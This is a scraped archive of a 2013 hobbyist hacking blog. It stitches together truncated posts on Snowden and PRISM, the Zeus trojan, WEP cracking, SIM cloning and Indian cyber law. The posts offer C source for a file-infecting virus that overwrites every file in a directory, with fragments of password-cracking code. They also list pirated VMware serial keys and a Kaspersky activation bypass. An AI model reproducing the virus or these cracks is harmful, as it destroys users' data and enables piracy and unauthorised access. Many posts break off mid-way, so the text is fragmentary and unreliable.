Wednesday 6 November 2013

REMOVE USB SHORTCUT VIRUS

If all your folders in pendrive/flash drives or memory cards are converted into shortcut icons then it is a good news for you. 

image
Now I’m going to tell you how to remove this virus without using any antivirus software. If you have not formatted your flash drive then you can solve this problem.

Most of the people come across this type of issues with their working environment.  So for solving it follow the steps given below:

Steps are very easy

First of all Click on Start >> Run >> and type cmd and click on OK

CYBER LAWS

Cyber Laws under Information Technology Act in India

- Section 43 of IT Act states any act of destroying, altering or stealing computer system/network or deleting information with act of damaging data or information without authorization of owner of that computer is liable for payment to be made to owner as compensation for damages

- Section 43A of IT Act states any corporate body dealing with sensitive information and negligent with implementing reasonable security practices causing loss or wrongful gain to any other person will also be liable as convict for compensation to the affected party

Monday 24 June 2013

WHISTLE BLOWER UPDATE

Several stories involving whistle-blower/espionage suspect Edward Snowden cropped up over the weekend, including word of a U.S. demand for his extradition and that he flew to Moscow Sunday, and is likely heading for another destination. And news of a Justice Department search of a former WikiLeaks volunteer's Gmail account has also surfaced. Here's a quick summary:
Snowden was allowed to leave Hong Kong because a U.S. extradition request did not fully comply with Hong Kong law. He landed in Moscow early Sunday morning, but his final destination is unclear. According to a report in the New York Times, he may be headed to Ecuador, Cuba or Venezuela. Via its statement on its website  and  on Twitter, WikiLeaks said that it provided assistance to Snowden in his search for political asylum, and that he landed in Moscow accompanied by WikiLeaks legal advisers."

Saturday 22 June 2013

Bank Accounts And Zeus Virus

How Your Bank Accounts Can Be Stolen With Zeus Virus?

 
 The 'Zeus Trojan Horse' Virus once again had a come back. According to a resource, it has an ability to drain your Bank accounts easily. Zeus Virus can propagate through phishing messages that are generated from the account that was already compromised with phishing. That phished account will then start sending messages to your friends containing links to the ads and would ask them to simply check-out the video or product by clicking on such links. This way the virus will go viral. Readers are requested to stay refrain from clicking such links, because they might end up getting their accounts compromised The virus is very sophisticated, so that it could replace the website of a bank with the mimicked page of its own. That fake page could then ask for your security information and some other important data that could be easily sold in black market. According to many sources, perhaps it has been confirmed that those pages are being hosted by Russian Mafia (known as Russian Business Network as well). About Zeus(Virus) The virus is well-known for what it use to do. It was detected once back in 2007, and after that detection it started to spread online. The virus is well-designed so that if you would click on it, the possible and important data like Passwords and Bank Accounts can be stolen easily. Does Facebook Took Action Against It? Facebook is aware of it, but it is unlikely that Facebook is going to take any action against it. The founder of advocacy group Fans Against Kounterfeit Enterprise (FAKE) said that he was trying to alert Facebook about this issue to take action against it as soon as possible, but unluckily he was not satisfied well with their response. Those who are using windows should stay much careful about this issue. It has been said that Windows devices are much infected with this virus. Hence, Mac OS X or Linux are still safe of this virus. Some countries like USA and UK are badly infected, though, India, Russia, Canada and France are also infected with the virus at some moderate limits. Some other countries like Australia, Argentina, Brazil, South Africa, Chile, Saudi Arabia, Pakistan, Indonesia and some other South-East Asian and European countries are less affected by this virus.

Sunday 16 June 2013

HACK REMOTE COMPUTERS ON YOUR NETWORK

Note : I m not responsible for what ur going to do with this trick.






Firstly I Will Tell You What Is Internet Protocol (IP) ??



The Internet Protocol is the principal communications protocol used for relaying datagram (packets) across an
internetwork using the Internet Protocol Suite. Responsible for routing packets across network boundaries, it is the primary protocol that establishes the Internet. 



IP is the primary protocol in the Internet layer of the Internet Protocol Suite and has the task of delivering
datagrams from the source host to the destination host solely based on their addresses. For this Purpose, IP defines addressing methods and structures for datagram encapsulation

HACK WIFI USING WINDOWS

Hi all users I think many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on Backtrack and other Linux Tools . So today I'm here for sharing a method to Crack WiFi networks using WEP security protocol .The WEP is a very vulnerable to attacks and can be cracked easily .
 

 

 It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it . 
 
 
You will be using two tools :
 
1. Commview for WiFi : You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .The more packets you capture the better chances of cracking the password .You will need more than 1,00,000 minium packets to crack the password .The packets will be captured in the .ncp format .You will use this tool to
convert the .ncp to .cap .

SERIAL KEYS OF 50+ SOFTWARES

╚═►VMware Workstation v9.X ◄═╝
 
Serial Key:→↓
ZF3X0-4ZW0Q-0842P-E6PGC-PKRZF
VY19K-01X5L-084MY-MXMZG-MAUF2
YA5X2-FEFDK-H80VQ-4YWQC-MPARD
YU1WA-F1GD7-485UQ-ADNNT-XCAR6
GF1WR-FGZ5J-485RY-JGQQC-XZ2G8
AY3HA-F1D5N-08D7Q-Z6X5T-XK2G2
YG5EK-D1X8L-088XY-NNQEC-P3AW6
VF14H-0YFE5-48D2Z-ZDPNT-YFUZ8
ZU31H-2WY83-0853Y-Z5WQZ-ZAAC6
GC1WK-F8XEM-M812P-9WMG9-XUU9F
AY540-00W0M-088DY-GDQ7T-QL8Z8
FF34U-A5W11-H80UP-F6WNV-NL8V6
CF71K-AGD52-H894Q-Q4P7E-XL2R6
YZ5MA-6GXDP-0841Y-K4PNG-XK2ZF
========================================================================
 
╚═►NovaPDF Professional Desktop v7.7.387◄═╝

TOP 15 FREE HACKING TOOLS




1. Nmap





Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

Sim Card Cloning

[Sim Cloning is Illegal. This Post is

Only  For Educational Use]

 
 
SIM cloning is the process in which a legitimate SIM card is duplicated. When the cloning is completed, the cloned SIM card's identifying information is transferred onto a separate, secondary SIM card. The secondary card can then be used in a different phone while having all calls and associated charges attributed to the original SIM card. The phrase SIM clone is often used to refer to the SIM card that has been successfully duplicated.

YES, a SIM Can be Cloned**
 
** There are Special considerations & Not All SIMs available, can be cloned.
 
You Need Special Hardware. NOT the ordinarily available SIM Reader/Writer. These "Writers" can ONLY insert SMS & Contacts . Nothing Beyond That.
The Hardware should be able to write to the EEPROM (or Programmable Memory) of the SIM.

NSA whistleblower: U.S has been hacking into China, Hong Kong

Former CIA employee Edward Snowden says the NSA's controversial PRISM program extends to China and Hong Kong, according to an interview with a Hong Kong newspaper.
 
The U.S. government had been hacking into computers in Hong Kong and China for years, says NSA whistleblower Edward Snowden.
The former CIA employee stirred up a hornet's nest recently when he leaked details about PRISM, a National Security Agency program that collects certain user information from Internet companies and phone service providers in an effort to track down terrorists.
In an interview with the South China Morning Post, Snowden said that PRISM actually extends to people and institutions in Hong Kong and mainland China. The NSA itself has been hacking into computers in Hong Kong and China since 2009, he added, citing documents that had not been verified by the Post.

Mozilla, EFF, ACLU rally public against electronic surveillance


Monday 10 June 2013

NSA PROGRAM OF US

What is the NSA's PRISM program? (FAQ)
 
We now know that the NSA uses something called PRISM to monitor private Web data. Sounds like "1984." What does it really mean?
 
You've been hearing about a top-secret government program reportedly giving the NSA access to digital consumer information held by large tech companies. But what is it, really, and how does it affect you? Reports are changing fast, so we created this FAQ to let you know what is known so far. We will continue to update it as the facts become clear.
 
What is PRISM?
PRISM stands for "Planning Tool for Resource Integration, Synchronization, and Management," and is a "data tool" designed to collect and process "foreign intelligence" that passes through American servers. Details about its existence were leaked to The Washington Post and The Guardian by Edward Snowden, a 29-year-old NSA contractor.
It has now been acknowledged by the Obama administration.
In the words of national security reporter Marc Ambinder, "PRISM [is] a kick-ass GUI that allows an analyst to look at, collate, monitor, and cross-check different data types provided to the NSA from Internet companies located inside the United States."

C PROGAM VIRUS


HOW TO CREATE VIRUS THROUGH "C" PROGRAMMING




#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

 

CODE FOR GETTING COMPUTER'S PASSWORD

CODE FOR GETTING COMPUTER'S PASSWORD


 Code :
 # include<stdio.h>
 # include<stdio.h>
 # include<process.h>
 # include<stdlib.h>
 # include<ctype.h>
 # include<conio.h>
 # include<mem.h>

 unsigned char huge Data[100001];
 unsigned char keystream[1001];
 int Rpoint[300];

 void main(int argc,char *argv[]){
 FILE *fd;
 int i,j;
 int size;
 char ch;
 char *name;
 int cracked;
 int sizemask;
 int maxr;
 int rsz;
 int pos;
 int Rall[300];     /* Resourse allocation table */

 if(argc<2){
   printf("usage: glide filename (username)");
   exit(1);
 }

PARTITION HIDING SOFTWARE IN C

PARTITION HIDING SOFTWARE IN C


 /* program to read the partition table of hard disk and can hide and
 revele partitions*/

 #include<stdio.h>
 #include<bios.h>
 #include<dos.h>
 #include<stdlib.h>

 typedef unsigned char BYTE;
 typedef unsigned int WORD;
 typedef unsigned long DWORD;

 enum BOOL {TRUE=0,FALSE=1};
 struct PARTITIONINFO {
  BYTE bootid;   /* bootable?  0=no, 128=yes  */
  BYTE beghead;  /* beginning head number */
  BYTE begsect;  /* beginning sector number */
  BYTE begcyl;   /* 10 bit nmbr, with high 2 bits put in begsect */
  BYTE systid;   /* Operating System type indicator code */
  BYTE endhead;  /* ending head number */
  BYTE endsect;  /* ending sector number */
  BYTE endcyl;   /* also a 10 bit nmbr, with same high 2 bit trick */
  DWORD relsect; /* first sector relative to start of disk */
  DWORD numsect; /* number of sectors in partition */
 };

FOLDER PROTECTION SOFTWARE


FOLDER PROTECTION PROGRAM


CAN BE COMPILED BY THE PREVIOSLY GIVEN COMPILERS IN THE POST NAMED SCREEN SAVER PASSWORD CRACKER.


 #include<stdio.h>
 #include<string.h>
 #include<process.h>
 void main()
 {
 FILE *p;
 char ch,s[100];
 char r[100]="REN ";

 char u[]=".{21EC2020-3AEA-1069-A2DD-08002B30309D} ";
 char v[50];
 int choice,i;

 clrscr();
 p=fopen("C:\a.bat","w+");
 if(p==NULL)

PASSWORD CRACKER

SCREEN SAVER PASSWORD CRACKER

THIS IS THE CODE OF A C/C++ PROGRAM WHICH CAN BE COMPILED BY USING DEV C++ AND CODE BLOKS OR TURBO C++. IT IS CREATED BY ONE OF MY FRIEND.


 /*
 Screen Saveer Password Cracker:
 Decrypts Screen Saver Password which is stored in user.dat.
 */

 #include<ctype.h>
 #include<stdio.h>
 #include<string.h>
 FILE *fp;
 char *path="c:\windows\user.dat";

 /*encrypted password stored in this file when u log on to default user..
 If there r multiple users..Password stored in
 \windowsprofilesuser-nameuser.dat...

 */

ACTIVATE KASPERSKY 2013 WITH KEY FILE

HOW TO ACTIVATE KASPERSKY 2013 13.0.1.4190 USING KEY FILES!
 
1. Open Kaspersky 2011 License Manager (from lower right corner).
 
2. Click 'Activate the application with a new license' button. (Delete any trial key first, by clicking the red X next to the key).
 
3. Disable your internet connection
 
4. Select 'Activate commercial version' and enter the activation license code as                                          11111-11111-11111-1111X
 
5. Wait activation wizard message-Click OK

Sunday 9 June 2013

Once Again Anonymous And Hacktivists Shocked The World

How Anonymous And Hacktivists Shocked The World In 2013 ?


1. Anonymous Hacks FBI Cybercrime Conference Call
 The LulzSec gang announced its retirement in June 2011, and while some alleged members, such as Jake Davis — accused of being the group’s spokesman, “Topiary” — were arrested, at the beginning of 2012, many participants appeared to be still at large.
 Come February 2012, elements of Anonymous even took down the CIA’s public-facing website, and leaked an FBI conference callin which investigators coordinated Anonymous and LulzSec participants” arrests. Curiously, however, key details — such as the alleged hacktivists’ names — had been blanked out of the audio file that was ultimately released.
 
2. Stratfor Hack Upends Private Sector Intelligence Provider
 Also in February, Anonymous announced the release of a trove of emails and personal data stored by Strategic Forecasting, better known as Stratfor, which is an intelligence contractor. A member of Anonymous — who turned out to be LulzSec leader Sabu – reported that the plaintext emails and customer information had been obtained by exploiting known vulnerabilities in the Stratfor network. Ultimately, the breach exposed personal information on 860,000 Stratfor customers, 60,000 credit card numbers and a massive trove of emails between Stratfor and its sources.

HOW TO ENABLE REGISTRY EDITING (regedit) DISABLED BY ADMINISTRATOR

This is the common problem faced every PC user and many of you do you do not know how to re-enable it so now I am going to tell you how to do it please just follow the steps given below :-
Enable Registry Editor Using Group Policy Editor
1. Click on Start. Go to Run. Users running Windows 8, Windows 7 or Vista, go to Search.
2. Type gpedit.msc and press Enter.
3. Navigate to User Configuration/ Administrative Templates / System.
4. In the work area, double click on "Prevent Access to registry editing tools".

E-BOOK ON HACKING

COLLECTION OF ANKIT FADIA'S BOOKS

HEY FRIENDS YOU ALL KNOW ABOUT ANKIT FADIA. HE IS ONE OF THE MOST HONORABLE AND RENOWNED HACKER(ETHICAL HACKER). NOW I AM GOING TO GIVE YOU A LINK TO DOWNLOAD A COLLECTION OF HIS BOOKS.

List of Ankit fadia's Hacking EBooks


1 . Ankit Fadia Hacker's Guide
2 . Untold Windows Tips and Secrets(Ankit Fadia)
3 . Base64 Encoding Torn Apart
4 . Batch File Programing - Ankit Fadia
5 . Closing Open Holes
6 . Defacing Websites A step Process By Ankit fadia
7 . Dos Attacked
8 . Ankit Fadia - Encryption Algorithms Explained
9 . Firewalls - How to unblock it??
10 . FTP Exploits By Ankit Fadia.pdf
11 . Gathering info on Remote Host
12 . Hacking into Linux
13 . More Password Cracking Decrypted
14 . Removing Banners from your sites
15 . Sendmail and Beyond
16.SSL Torn Apart
17.Tracing IP,DNS,WHOIS-nslLookUp
18.Transparent Proxies in Squid
19.Transparent_proxies_with_Squid_By-Ankit Fadia
20.Truths!!!--What They Don't teach in
Manuals!!!.pdf

I'M BACK ONCE AGAIN

HELLO READERS I WAS BUSY IN MY RESEARCH WORK AND THUS WAS NOT ABLE TO POST ANY NEW THING SINCE A LONG TIME BUT NOW I AM BACK ONCE AGAIN AND YOU WILL BE ABLE TO GET SOME NEW OR COOL STUFFS IN THIS BLOG NOW. SO GET READY AND ENJOY MY NEW SIDE.